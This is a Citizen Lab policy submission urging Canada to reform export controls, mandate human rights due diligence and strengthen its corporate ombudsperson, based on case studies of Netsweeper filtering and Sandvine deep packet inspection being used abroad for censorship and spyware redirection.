ResearchFree Expression Online

Submission to the Government of Canada on the Renewal of the Responsible Business Conduct Strategy

Introduction 

On 18 September 2020, the Government of Canada opened a public consultation on the renewal of its Responsible Business Conduct (RBC) strategy, which is intended to provide guidance to the Government of Canada and Canadian companies active abroad with respect to their business activities. The following submission from the Citizen Lab addresses Canadian technology companies and the threat they pose to human rights abroad. The submission proceeds as follows. First, we describe the research that the Citizen Lab has conducted at the intersection of technology and human rights. Second, we describe two case studies involving companies with a Canadian business presenceSandvine and Netsweeper—whose technology has been used to violate human rights abroad. Third, we suggest mechanisms the Government of Canada’s RBC strategy can adopt to address the harmful impacts of Canadian-made technology abroad. 

The Negative Impact of Technology on Human Rights 

The Citizen Lab is an interdisciplinary laboratory based at the Munk School of Global Affairs & Public Policy, University of Toronto, focusing on research, development, and high-level strategic policy and legal engagement at the intersection of information and communication technologies, human rights, and global security.

Researchers at the Citizen Lab use a “mixed methods” approach to research, combining practices from political science, law, computer science, and area studies. The Citizen Lab’s research includes investigating digital espionage against civil society, documenting Internet filtering and other technologies and practices that impact freedom of expression online, analyzing privacy, security, and information controls of popular applications, and examining transparency and accountability mechanisms relevant to the relationship between corporations and state agencies regarding personal data and other surveillance activities. 

The Citizen Lab’s research over the past few decades has undeniably shown that technology has a fundamental impact on internationally-protected human rights, including the right to privacy, freedom of expression, the right to life, liberty and security of the person, protection against discrimination, and other rights. For example, the Citizen Lab’s research into dual-use technologies has demonstrated how network traffic management technology (e.g., deep packet inspection and content filtering) and device intrusion for targeted monitoring tools (e.g., spyware) can be deployed in ways that seriously impair human rights. The Citizen Lab has also conducted research into emerging technologies and their impact on human rights, in particular on automated decision-making and artificial intelligence systems and the human rights harms that flow from the use of such technology. This research shows that the human rights impacts of automated decision-making in immigration and refugee law in Canada are far-reaching. Research by the Citizen Lab examining algorithmic technologies designed for use by law enforcement in Canada also reveals the broad and troubling impact of the use of these technologies on the rights to privacy, freedom of expression, peaceful assembly and association, equality and freedom from discrimination, as well as the rights to liberty and freedom from arbitrary detention. 

In short, the Citizen Lab’s research over nearly two decades demonstrates that technology can have a serious and negative impact on human rights, both in Canada and abroad. In this next section, we discuss in more depth two case studies where companies with strong ties to Canada and a corporate presence in this country have manufactured and exported technology that has facilitated human rights violations. They demonstrate that the Government of Canada has provided material support for firms whose products restrict human rights abroad, and that reform is needed to ensure corporate compliance and respect for international human rights law. 

Two Canadian Case Studies: Sandvine and Netsweeper

The Citizen Lab has conducted research into two companies with strong corporate ties in Canada and whose exported technology has been used to violate human rights abroad. In this section, we describe the companies at issue, the type of technology exported, and how the technology has been used to abuse and infringe human rights. These two case studies show that current Canadian laws and policies regarding the sale of technology manufactured and developed in Canada and sold abroad do not sufficiently prevent human rights abuses. In the final section of this submission, we set forth recommendations on reforms that the Government of Canada should implement as part of the renewal of the RBC strategy.

Netsweeper’s Internet-Filtering Technology

Netsweeper Inc. is one of many Canada-based technology companies situated along the Toronto-Waterloo Innovation Corridor. The company sells a suite of technology products related to Internet categorization and filtering that enable administrators to restrict Internet users’ access to websites. They market their products as tools that allow librarians to block pornography, schools to enable safe search options on platforms like Google, and workplaces to block social media sites and combat lost productivity. The company has received material support from the Governments of Canada and Ontario. For example, it was awarded research grants from the National Research Council  in 2009 and 2012. It has been described as a “success story” by the Government of Ontario, which also provided support through its Export Access Market program. Netsweeper has also been included in international trade promotion facilitated by the Government of Canada, and, in 2016, Export Development Canada provided a guarantee to facilitate the financing of the company’s sale to Bahrain.

While Netsweeper’s products seem innocuous, technical research shows that their products are systematically used for other purposes that the company does not advertise. In 2018, the Citizen Lab released a report documenting Netsweeper installations on public IP networks in ten countries that each presented widespread human rights concerns. This research revealed that Netsweeper technology was used to block: (1) political content sites, including websites linked to political groups, opposition groups, local and foreign news, and regional human rights issues in Bahrain, Kuwait, Yemen, and UAE; (2) LGBTQ content as a result of Netsweeper’s pre-defined ‘Alternative Lifestyles’ content category, as well as Google searches for keywords relating to LGBTQ content (e.g., the words “gay” or “lesbian”) in the UAE, Bahrain, and Yemen; (3) non-pornographic websites under the mis-categorization of sites like the World Health Organization and the Center for Health and Gender Equity as “pornography”; (4) access to news reporting on the Rohingya refugee crisis and violence against Muslims from multiple news outlets for users in India; (5) Blogspot-hosted websites in Kuwait by categorizing them as “viruses” as well as a range of political content from local and foreign news and a website that monitors human rights issues in the region; and (6) websites like Date.com, Gay.com (the Los Angeles LGBT Center), Feminist.org, and others through categorizing them as “web proxies.” 

Furthermore, in 2015, the Citizen Lab released a report documenting how Netsweeper technology was used to block Internet content during the armed conflict in Yemen and following the dictates of the Houthis, a Yemeni rebel group. Content-filtering in this case included a wider variety of political content and the entire .il (Israel) domain. As access to information is a critical factor in any contextparticularly during an armed conflict and where civilians rely on the Internet for news to stay safe and communicatethis represented a particularly serious human rights abuse. 

As noted by the Citizen Lab and other organizations, this use of Netsweeper’s technology has threatened a number of internationally-protected human rights, including the right to freedom of opinion and expression, the freedom to seek, receive, and impart information and ideas, protections against discrimination, minority protection, and the rights to liberty and security of the person. International human rights institutions have taken a similarly critical view of Internet-filtering technology. For example, in General Comment No. 34, the United Nations (UN) Human Rights Committee noted that article 19 of the International Covenant on Civil and Political Rights (ICCPR) protects all forms of expression, including “electronic and internet-based modes of expression.” In his 2011 report, the UN Special Rapporteur on the promotion and protection of all human rights, civil, political, economic, social and cultural rights, including the right to development, Frank La Rue, described how “blocking and filtering” represented one “restriction on the right of individuals to express themselves through the Internet” and noted that “States’ use of blocking or filtering technologies is frequently in violation of their obligation to guarantee the right to freedom of expression” under international human rights law.  A number of other regional and international human rights instruments have declared that freedom of expression applies to the Internet and that “[m]andatory blocking of entire websites, IP addresses, ports, network protocols or types of uses (such as social networking) is an extreme measure” that can “only be justified in accordance with international standards.” Further, content filtering systems “which are not end-user controlled are a form of prior censorship and are not justifiable as a restriction on freedom of expression.”  In short, the use of Netsweeper technology by importing countries in the filtering and blocking of websites and content violates internationally-protected human rights.  

Sandvine’s Deep Packet Inspection Technology

Sandvine is a US-based technology company that produces networking equipment primarily used by large Internet service providers (ISPs). Originally founded in Waterloo, Ontario in 2001, the company was purchased in 2017 by US-based private equity firm Francisco Partners and merged with Procera Networks into a combined entity named Sandvine. The company maintains offices in Waterloo and a number of other locations around the world. It sells a suite of networking devices, including deep packet inspection (DPI) technology. While DPI is used by ISPs for innocuous purposes like traffic management, the same technology can be used to block access to websites or to inject malicious traffic targeting specific users or content.

In 2018, the Citizen Lab released a report documenting the use of Sandvine/Procera devices to redirect users in Turkey and Syria to spyware, as well as the use of such devices to hijack the Internet users’ connections in Egypt, redirecting them to revenue-generating content. These examples highlight some of the ways in which this technology can be used for malicious purposes. The report revealed how Citizen Lab researchers identified a series of devices on the networks of Türk Telekom—a large and previously state-owned ISP in Turkey—being used to redirect requests from users in Turkey and Syria who attempted to download certain common Windows applications like antivirus software and web browsers. Through the use of Sandvine/Procera technology, these users were instead redirected to versions of those applications that contained hidden malware. 

Citizen Lab researchers also found that middleboxes were being used across dozens of ISPs across Egypt to redirect users to affiliate ad and cryptocurrency mining scripts, both of which were likely being used to generate illicit revenue. After an extensive technical investigation that included purchasing a second-hand device, researchers found that the unique characteristics of the middleboxes used in both Turkey and Egypt matched those of Sandvine’s PacketLogic devices. They also identified devices matching these characteristics in both countries that were being used to block access to websites, including political, media, and human rights content. 

In August 2020, media reporting also suggested that technology made by Sandvine was being used to block access to websites in Belarus, following nationwide protests over the country’s disputed presidential election. Reporting indicated that widespread outages, lasting days, included the inability to access Facebook, Twitter, YouTube, and Google. While representatives of Sandvine initially pointed to its corporate ethics policy in response, media reports revealed the CTO’s private acknowledgement that the company’s technology was being used in Belarus, which also claimed that access to the Internet was not “a part of human rights.” Sandvine owner Francisco Partners nonetheless later cancelled their contract with Belarus, claiming that the use of their tools to block access to websites “is a human rights violation.”  

Sandvine’s DPI technology has thus been used to infringe a number of internationally-protected human rights. The deleterious human rights impacts of DPI systems, as well as Internet-filtering technology, have been exposed in detail by the UN Special Rapporteur on the promotion and protection of the right to freedom of opinion and expression, David Kaye, in multiple reports to the UN. In his 2017 report to the UN Human Rights Council, the Special Rapporteur addressed the role played by private actors that provide Internet and telecommunications. He observed that the “multiple uses” of design network equipment and technology raised freedom of expression and privacy concerns. For example, DPI technologies, which can sometimes be used for innocuous purposes, “have also been employed to filter Internet content, intercept communications and throttle data flows.” As the Special Rapporteur stated, the improper use of DPI and Internet filtering technologies to mediate publicly-available Internet access by states poses a significant threat to human rights when that filtering is applied covertly, arbitrarily, without due process, or without regard for legitimate forms of expression. 

Further, technology like DPI and Internet filtering technologies also impacts the right to privacy (protected under article 17 of the ICCPR).  While restrictions on the right to privacy are sometimes permissible, such restrictions are subject to strict limitations of legality, necessity, and proportionality under international law. Further, given that targeted surveillance disproportionately impacts vulnerable groups, including racial, religious, ethnic, gender, and sexual minorities, state surveillence practices may also violate international human rights prohibitions on discrimination and protections for minority rights (protected under articles 26 and 27 of the ICCPR) and may infringe upon other rights such as the rights to liberty and security of the person (protected under article 9 of the ICCPR).

Recommendations for the Government of Canada

These two case studies underline the need for more robust action to ensure that technology manufactured in Canada is not used abroad to undermine or violate internationally-protected rights. The renewal of the RBC strategy provides an opportunity for such reform. As the Government of Canada noted in its call for submissions, companies have a duty to respect human rights, and the state has a duty to protect these same rights. More concrete and legally enforceable steps must be taken by the Government of Canada to ensure that both of these principles, as articulated in the UN Guiding Principles on Business and Human Rights, are fulfilled. While corporate social responsibility and other soft law norms have been useful in transitioning states and companies towards more robust human rights protections and in developing substantive legal norms in this area, it is time for the Government of Canada to take the next logical step, by reforming export control law and imposing legally-binding requirements on businesses and governments to conduct adequate human rights due diligence before technologies are sold abroad. 

Reforming Canadian Export Law 

Some progress has been made in integrating human rights requirements into Canadian export controls. In particular, the Government of Canada’s ratification of the Arms Trade Treaty ushered in new human rights considerations. Under section 7.3(1) of the Export and Import Permits Act (EIPA), the Ministerin respect of arms, ammunition, implements, or munitions of warhas to consider whether the goods or technology subject to export control “could be used to commit or facilitate … a serious violation of international human rights law” (among other grounds). Further, under section 7.4 of the EIPA, the Minister “shall not” issue a export permit in respect of arms, ammunition, implements, or munitions of war, if it concludes that there is a “substantial risk” that the technology being exported would lead to serious violations of international human rights law. While the text of the EIPA suggests that technology that does not qualify as “arms, ammunition, implements or munitions of war” may be excluded from this mandatory assessment in relation to human rights harms, the Government of Canada’s own guidance suggests that such considerations would apply more broadly to all exports. As a preliminary suggestion, we would recommend issuing a directive that clarifies that any technology subject to export control is assessed for its human rights impacts prior to an export permit being issued. 

Further, while these amendments brought by accession to the Arms Trade Treaty are helpful, they do not go far enough when it comes to Canadian-made and developed technology that could threaten human rights abroad. The considerations described above only apply when an export is already subject to export controli.e., goods or technology that are already on the EIPA‘s Area Control List or Export Control List. Netsweeper’s Internet-filtering technology provides a helpful example of why this framework is insufficient. Since Internet-filtering technology is not on the Export Control List, Netsweeper can sell the technology abroad without an export license and without any evaluation of the human rights risks posed by the technology. 

As recommended by the Senate Standing Committee on Human Rights in 2018, one remedy for this legislative gap is to include consideration for negative human rights consequences of a technology as a basis for the Government of Canada to implement export control under section 3(1) of the EIPA and place the good on the Export Control List. More specifically, and as the Senate Standing Committee on Human Rights recommended two years ago, the EIPA should be updated to ensure that Canadian technology exports are subject to export control (e.g., placed on an Export Control List) whenever there is a substantial risk that the export could be used to commit or facilitate a serious human rights violation. As noted by the Committee, the analysis of whether there will be this kind of negative human rights impact requires an examination of the intended use of the technology rather than a neutral evaluation of the technology itself. This is because so-called ‘dual-use’ technology may simultaneously have both legitimate and socially beneficial functions, as well as the potential for abuse, censorship, or other human rights violations. In order to ensure appropriate controls over such exports, the EIPA could be amended to include a ‘catch-all’ scheme similar to that being debated in the European Union. This ‘catch-all’ language could require export authorisation for non-listed cyber-surveillance technology where there is evidence that the end-use “may be in connection with internal repression and/or the commission of serious violations of international human rights and international humanitarian law.” 

Mandatory Human Rights Due Diligence

In conjunction with these recommended updates to the EIPA, mandatory due diligence requirements for corporate actors who intend to export goods or technology abroad would provide another mechanism to ensure greater respect for and protection of human rights. 

Human rights due diligence obligations are becoming a global norm. In 2017, France adopted its duty of vigilance law that requires all transnational businesses over a certain size to establish and implement a due diligence process for monitoring severe human rights violations that arise directly or indirectly from their operations. The Swiss government has been considering a similar law to the French model, German civil society has launched a campaign for human rights and environmental due diligence legislation, and the Finnish government has also committed to exploring mandatory human rights due diligence laws. In April 2020, the European Commissioner for Justice announced the European Commission’s commitment to introducing rules for mandatory corporate environmental and human rights due diligence as well. In July 2020, the European Commission published an Inception Impact Assessment for sustainable corporate governance and sought public feedback on further action in this area. Other laws, such as the US Dodd-Frank Act‘s due diligence requirements for conflict minerals or the Dutch Child Labour Due Diligence Law proposal, adopt human rights due diligence in specific commercial spheres.

At the international level, the UN Intergovernmental Working Group on Transnational Corporations and Other Business Enterprises With Respect to Human Rights (IGWG) continues to work towards a binding international treaty on business and human rights. In August 2020, the IGWG released the Second Revised Draft of the proposed treaty, article 6.2 of which requires States to adopt legislation requiring “business enterprises … to undertake human rights due diligence proportionate to their size, risks of severe human rights impacts and the nature and context of their operations.” The Second Revised Draft also outlines four explicit duties that the legislation must impose on businesses. Failure to comply with these duties, according to article 6.6, results in sanctions that are “without prejudice to the provisions on criminal, civil and administrative liability.” Additionally, articles 7 to 11 require states to remove remedial barriers faced by victims of human rights abuses committed by private actors. Other aspects of the Second Revised Draft include its inclusion of environmental issues within the definition of human rights abuses, corporate exposure to liability for acts committed throughout the entity’s supply chain, the preclusion of defences in civil cases based on forum non conveniens, and a requirement that states adopt legislation providing for corporate criminal liability “for human rights abuses that amount to criminal offences under international human rights law.” Although Canada has been relatively silent in the drafting process, when the IGWG convenes for the Sixth Session on 26 to 30 October 2020, we recommend that Canada should put its support behind the proposed treaty.

While the nature and content of human rights due diligence laws differ across jurisdictions, the minimum requirements of a due diligence law could look similar to what is required under the French duty of vigilance law. These requirements should therefore include, at minimum, a requirement of risk-mapping in relation to potential human rights risks raised by the technology under review, the development of appropriate whistleblowing mechanisms, the identification of actions to prevent and mitigate negative human rights impacts, an alerts mechanism to assess and identify human rights risks before and after export, and the development of a monitoring and public reporting scheme. Further, the US Department of State recently released guidelines on the implementation of the UN Guiding Principles on Business and Human Rights for transactions linked to foreign government end-users for products or services with surveillance capabilities. The US guidelines describe in detail the components of effective due diligence and identify specific red flags and concerns related to companies that produce surveillance technologies. They should also inform binding legislation in Canada.

The Government of Canada could rely, in part, on corporate identification and publication of human rights risks identified through this due diligence process to update the Export Control List. Such reporting could also be used by the government to determine whether a product falls within the proposed ‘catch-all’ provision and should be subject to export control. Further, any due diligence law should impose a framework of statutory liability for business actors that fail to conduct human rights due diligence or fail to do so with the appropriate standard of care. 

Expand and Strengthen the Canadian Ombudsperson for Responsible Enterprise (CORE)

Ensuring that civil society and victims of corporate abuses can seek redress for human rights violations will also be critical to the proper functioning of the EIPA and mandatory human rights due diligence. 

The Office of the Canadian Ombudsperson for Responsible Enterprise (CORE) could play an essential role on this count by receiving and proactively investigating complaints about technology companies accused of violating human rights abroad, and taking steps to ensure accountability. However, the CORE is presently only focused on human rights issues arising from Canadian garment, mining, and oil and gas companies operating abroad, and lacks powers to compel companies and their executives to provide testimony, information, and documents in the course of its fact-finding investigations. The CORE also lacks sufficient powers to impose penalties and other accountability measures in response to its findings. Instead, its current mandate only includes the capacity to offer vague and undefined “informal mediation services” and to make recommendations or provide referrals to other governmental agencies. Furthermore, the CORE’s budget is plainly insufficient for it to successfully carry out its mandate, providing funding for only four full-time staff.

We recommend that the Government of Canada strengthen the CORE, expand its mandate, and empower it to hold Canadian companies meaningfully accountable for abuses committed abroad. First, the CORE should immediately be given jurisdiction to tackle human rights issues associated with the technology sector beyond the garment, mining, and oil and gas sectors and its budget should be increased accordingly to reflect this new mandate. Second, the CORE’s investigatory and accountability powers should be expanded to include a capacity to impose penalties and mandatory production orders, as well as new statutory remedies for victims of human rights abuses committed by corporations and for circumstances where corporations fail to comply with mandatory human rights due diligence obligations. 

Conclusion

In this brief, the Citizen Lab has put forward a number of recommendations regarding the renewal of the RBC strategy by the Government of Canada with respect to Canadian technology that threatens human rights abroad. We summarize these recommendations here:

Reform Canadian export law:  

  1. Clarify that all Canadian exports are subject to the mandatory analysis set out in section 7.3(1) and section 7.4 of the EIPA
  2. Amend section 3(1) the EIPA such that the human rights risks of an exported good or technology provide an explicit basis for export control.
  3. Amend the EIPA to include a ‘catch-all’ provision that subjects cyber-surveillance technology to export control, even if not listed on the Export Control List, when there is evidence that the end-use may be connected with internal repression and/or the commission of serious violations of international human rights or international humanitarian law. 

Implement mandatory human rights due diligence legislation:

  1. Similar to the French duty of vigilance law, impose a human rights due diligence requirement on businesses such that they are required to perform human rights risk assessments, develop mitigation strategies, implement an alert system, and develop a monitoring and public reporting scheme. 
  2. Ensure that the mandatory human rights due diligence legislation provides a statutory mechanism for liability where a company fails to conform with the requirements under the law. 

Expand and strengthen the CORE: 

  1. Expand the CORE’s mandate to cover technology sector businesses operating abroad.
  2. Expand the CORE’s investigatory mandate to include the power to compel companies and executives to produce testimony, documents, and other information for the purposes of joint and independent fact-finding.
  3. Strengthen the CORE’s powers to hold companies to account for human rights violations abroad, including the power to impose fines and penalties and to impose mandatory orders.
  4. Expand the CORE’s mandate to assist victims to obtain legal redress for human rights abuses. This could include the CORE helping enforce mandatory human rights due diligence requirements, imposing penalties and/or additional statutory mechanisms for redress when requirements are violated.
  5. Increase the CORE’s budgetary allocations to ensure that it can carry out its mandate.

Acknowledgements 

We would also like to thank Miles Kenyon (Communications Specialist, Citizen Lab) for his support in reviewing this submission.